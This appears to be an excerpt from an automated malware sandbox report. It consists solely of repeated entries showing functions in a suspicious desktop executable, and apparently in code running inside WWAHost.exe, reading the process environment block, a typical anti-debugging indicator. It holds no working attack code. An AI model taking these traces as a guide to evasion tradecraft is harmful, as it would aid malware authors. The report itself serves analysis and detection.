Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h] 1_2_00C06C0A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h] 1_2_00C06C0A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h] 1_2_00C06C0A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA746D mov eax, dword ptr fs:[00000030h] 1_2_00BA746D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBA44B mov eax, dword ptr fs:[00000030h] 1_2_00BBA44B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h] 1_2_00C06DC9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h] 1_2_00C06DC9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h] 1_2_00C06DC9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov ecx, dword ptr fs:[00000030h] 1_2_00C06DC9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h] 1_2_00C06DC9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h] 1_2_00C06DC9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00BB1DB5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00BB1DB5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00BB1DB5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB35A1 mov eax, dword ptr fs:[00000030h] 1_2_00BB35A1
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBFD9B mov eax, dword ptr fs:[00000030h] 1_2_00BBFD9B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBFD9B mov eax, dword ptr fs:[00000030h] 1_2_00BBFD9B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00C4FDE2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00C4FDE2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00C4FDE2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00C4FDE2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C38DF1 mov eax, dword ptr fs:[00000030h] 1_2_00C38DF1
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h] 1_2_00B82D8A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h] 1_2_00B82D8A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h] 1_2_00B82D8A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h] 1_2_00B82D8A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h] 1_2_00B82D8A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h] 1_2_00BB2581
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h] 1_2_00BB2581
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h] 1_2_00BB2581
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h] 1_2_00BB2581
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00B9D5E0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00B9D5E0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C505AC mov eax, dword ptr fs:[00000030h] 1_2_00C505AC
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C505AC mov eax, dword ptr fs:[00000030h] 1_2_00C505AC
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h] 1_2_00BB4D3B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h] 1_2_00BB4D3B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h] 1_2_00BB4D3B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C03540 mov eax, dword ptr fs:[00000030h] 1_2_00C03540
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8AD30 mov eax, dword ptr fs:[00000030h] 1_2_00B8AD30
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAC577 mov eax, dword ptr fs:[00000030h] 1_2_00BAC577
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAC577 mov eax, dword ptr fs:[00000030h] 1_2_00BAC577
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA7D50 mov eax, dword ptr fs:[00000030h] 1_2_00BA7D50
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C58D34 mov eax, dword ptr fs:[00000030h] 1_2_00C58D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C0A537 mov eax, dword ptr fs:[00000030h] 1_2_00C0A537
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4E539 mov eax, dword ptr fs:[00000030h] 1_2_00C4E539
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC3D43 mov eax, dword ptr fs:[00000030h] 1_2_00BC3D43
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C3FEC0 mov eax, dword ptr fs:[00000030h] 1_2_00C3FEC0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03851B8F mov eax, dword ptr fs:[00000030h] 7_2_03851B8F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03851B8F mov eax, dword ptr fs:[00000030h] 7_2_03851B8F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038FD380 mov ecx, dword ptr fs:[00000030h] 7_2_038FD380
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872397 mov eax, dword ptr fs:[00000030h] 7_2_03872397
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03858794 mov eax, dword ptr fs:[00000030h] 7_2_03858794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387B390 mov eax, dword ptr fs:[00000030h] 7_2_0387B390
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h] 7_2_038C7794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h] 7_2_038C7794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h] 7_2_038C7794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0390138A mov eax, dword ptr fs:[00000030h] 7_2_0390138A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03915BA5 mov eax, dword ptr fs:[00000030h] 7_2_03915BA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C53CA mov eax, dword ptr fs:[00000030h] 7_2_038C53CA
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C53CA mov eax, dword ptr fs:[00000030h] 7_2_038C53CA
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h] 7_2_038703E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h] 7_2_038703E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h] 7_2_038703E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h] 7_2_038703E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h] 7_2_038703E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h] 7_2_038703E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038837F5 mov eax, dword ptr fs:[00000030h] 7_2_038837F5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387A70E mov eax, dword ptr fs:[00000030h] 7_2_0387A70E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387A70E mov eax, dword ptr fs:[00000030h] 7_2_0387A70E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0390131B mov eax, dword ptr fs:[00000030h] 7_2_0390131B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386F716 mov eax, dword ptr fs:[00000030h] 7_2_0386F716
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0391070D mov eax, dword ptr fs:[00000030h] 7_2_0391070D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0391070D mov eax, dword ptr fs:[00000030h] 7_2_0391070D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DFF10 mov eax, dword ptr fs:[00000030h] 7_2_038DFF10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DFF10 mov eax, dword ptr fs:[00000030h] 7_2_038DFF10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03844F2E mov eax, dword ptr fs:[00000030h] 7_2_03844F2E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03844F2E mov eax, dword ptr fs:[00000030h] 7_2_03844F2E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387E730 mov eax, dword ptr fs:[00000030h] 7_2_0387E730
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384DB40 mov eax, dword ptr fs:[00000030h] 7_2_0384DB40
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385EF40 mov eax, dword ptr fs:[00000030h] 7_2_0385EF40
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03918B58 mov eax, dword ptr fs:[00000030h] 7_2_03918B58
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384F358 mov eax, dword ptr fs:[00000030h] 7_2_0384F358
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384DB60 mov ecx, dword ptr fs:[00000030h] 7_2_0384DB60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385FF60 mov eax, dword ptr fs:[00000030h] 7_2_0385FF60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03918F6A mov eax, dword ptr fs:[00000030h] 7_2_03918F6A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03873B7A mov eax, dword ptr fs:[00000030h] 7_2_03873B7A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03873B7A mov eax, dword ptr fs:[00000030h] 7_2_03873B7A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DFE87 mov eax, dword ptr fs:[00000030h] 7_2_038DFE87
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387D294 mov eax, dword ptr fs:[00000030h] 7_2_0387D294
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387D294 mov eax, dword ptr fs:[00000030h] 7_2_0387D294
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h] 7_2_038452A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h] 7_2_038452A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h] 7_2_038452A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h] 7_2_038452A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h] 7_2_038452A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C46A7 mov eax, dword ptr fs:[00000030h] 7_2_038C46A7
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h] 7_2_03910EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h] 7_2_03910EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h] 7_2_03910EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385AAB0 mov eax, dword ptr fs:[00000030h] 7_2_0385AAB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385AAB0 mov eax, dword ptr fs:[00000030h] 7_2_0385AAB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387FAB0 mov eax, dword ptr fs:[00000030h] 7_2_0387FAB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03918ED6 mov eax, dword ptr fs:[00000030h] 7_2_03918ED6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038736CC mov eax, dword ptr fs:[00000030h] 7_2_038736CC
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872ACB mov eax, dword ptr fs:[00000030h] 7_2_03872ACB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038FFEC0 mov eax, dword ptr fs:[00000030h] 7_2_038FFEC0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03888EC7 mov eax, dword ptr fs:[00000030h] 7_2_03888EC7
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872AE4 mov eax, dword ptr fs:[00000030h] 7_2_03872AE4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038716E0 mov ecx, dword ptr fs:[00000030h] 7_2_038716E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038576E2 mov eax, dword ptr fs:[00000030h] 7_2_038576E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h] 7_2_0384C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h] 7_2_0384C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h] 7_2_0384C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03878E00 mov eax, dword ptr fs:[00000030h] 7_2_03878E00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03858A0A mov eax, dword ptr fs:[00000030h] 7_2_03858A0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384AA16 mov eax, dword ptr fs:[00000030h] 7_2_0384AA16
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384AA16 mov eax, dword ptr fs:[00000030h] 7_2_0384AA16
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03863A1C mov eax, dword ptr fs:[00000030h] 7_2_03863A1C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387A61C mov eax, dword ptr fs:[00000030h] 7_2_0387A61C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387A61C mov eax, dword ptr fs:[00000030h] 7_2_0387A61C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384E620 mov eax, dword ptr fs:[00000030h] 7_2_0384E620
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038FFE3F mov eax, dword ptr fs:[00000030h] 7_2_038FFE3F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849240 mov eax, dword ptr fs:[00000030h] 7_2_03849240
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849240 mov eax, dword ptr fs:[00000030h] 7_2_03849240
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849240 mov eax, dword ptr fs:[00000030h] 7_2_03849240
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849240 mov eax, dword ptr fs:[00000030h] 7_2_03849240
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h] 7_2_03857E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h] 7_2_03857E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h] 7_2_03857E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h] 7_2_03857E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h] 7_2_03857E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h] 7_2_03857E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038D4257 mov eax, dword ptr fs:[00000030h] 7_2_038D4257
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385766D mov eax, dword ptr fs:[00000030h] 7_2_0385766D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038FB260 mov eax, dword ptr fs:[00000030h] 7_2_038FB260
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038FB260 mov eax, dword ptr fs:[00000030h] 7_2_038FB260
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0388927A mov eax, dword ptr fs:[00000030h] 7_2_0388927A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03918A62 mov eax, dword ptr fs:[00000030h] 7_2_03918A62
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h] 7_2_0386AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h] 7_2_0386AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h] 7_2_0386AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h] 7_2_0386AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h] 7_2_0386AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387A185 mov eax, dword ptr fs:[00000030h] 7_2_0387A185
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386C182 mov eax, dword ptr fs:[00000030h] 7_2_0386C182
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872581 mov eax, dword ptr fs:[00000030h] 7_2_03872581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872581 mov eax, dword ptr fs:[00000030h] 7_2_03872581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872581 mov eax, dword ptr fs:[00000030h] 7_2_03872581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872581 mov eax, dword ptr fs:[00000030h] 7_2_03872581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h] 7_2_03842D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h] 7_2_03842D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h] 7_2_03842D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h] 7_2_03842D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h] 7_2_03842D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872990 mov eax, dword ptr fs:[00000030h] 7_2_03872990
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387FD9B mov eax, dword ptr fs:[00000030h] 7_2_0387FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387FD9B mov eax, dword ptr fs:[00000030h] 7_2_0387FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038735A1 mov eax, dword ptr fs:[00000030h] 7_2_038735A1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038761A0 mov eax, dword ptr fs:[00000030h] 7_2_038761A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038761A0 mov eax, dword ptr fs:[00000030h] 7_2_038761A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C69A6 mov eax, dword ptr fs:[00000030h] 7_2_038C69A6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h] 7_2_03871DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h] 7_2_03871DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h] 7_2_03871DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h] 7_2_038C51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h] 7_2_038C51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h] 7_2_038C51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h] 7_2_038C51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0384B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0384B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0384B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038D41E8 mov eax, dword ptr fs:[00000030h] 7_2_038D41E8
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385D5E0 mov eax, dword ptr fs:[00000030h] 7_2_0385D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385D5E0 mov eax, dword ptr fs:[00000030h] 7_2_0385D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038F8DF1 mov eax, dword ptr fs:[00000030h] 7_2_038F8DF1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849100 mov eax, dword ptr fs:[00000030h] 7_2_03849100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849100 mov eax, dword ptr fs:[00000030h] 7_2_03849100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849100 mov eax, dword ptr fs:[00000030h] 7_2_03849100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03918D34 mov eax, dword ptr fs:[00000030h] 7_2_03918D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03864120 mov eax, dword ptr fs:[00000030h] 7_2_03864120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03864120 mov eax, dword ptr fs:[00000030h] 7_2_03864120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03864120 mov eax, dword ptr fs:[00000030h] 7_2_03864120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03864120 mov eax, dword ptr fs:[00000030h] 7_2_03864120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03864120 mov ecx, dword ptr fs:[00000030h] 7_2_03864120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384AD30 mov eax, dword ptr fs:[00000030h] 7_2_0384AD30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038CA537 mov eax, dword ptr fs:[00000030h] 7_2_038CA537
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h] 7_2_03874D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h] 7_2_03874D3B
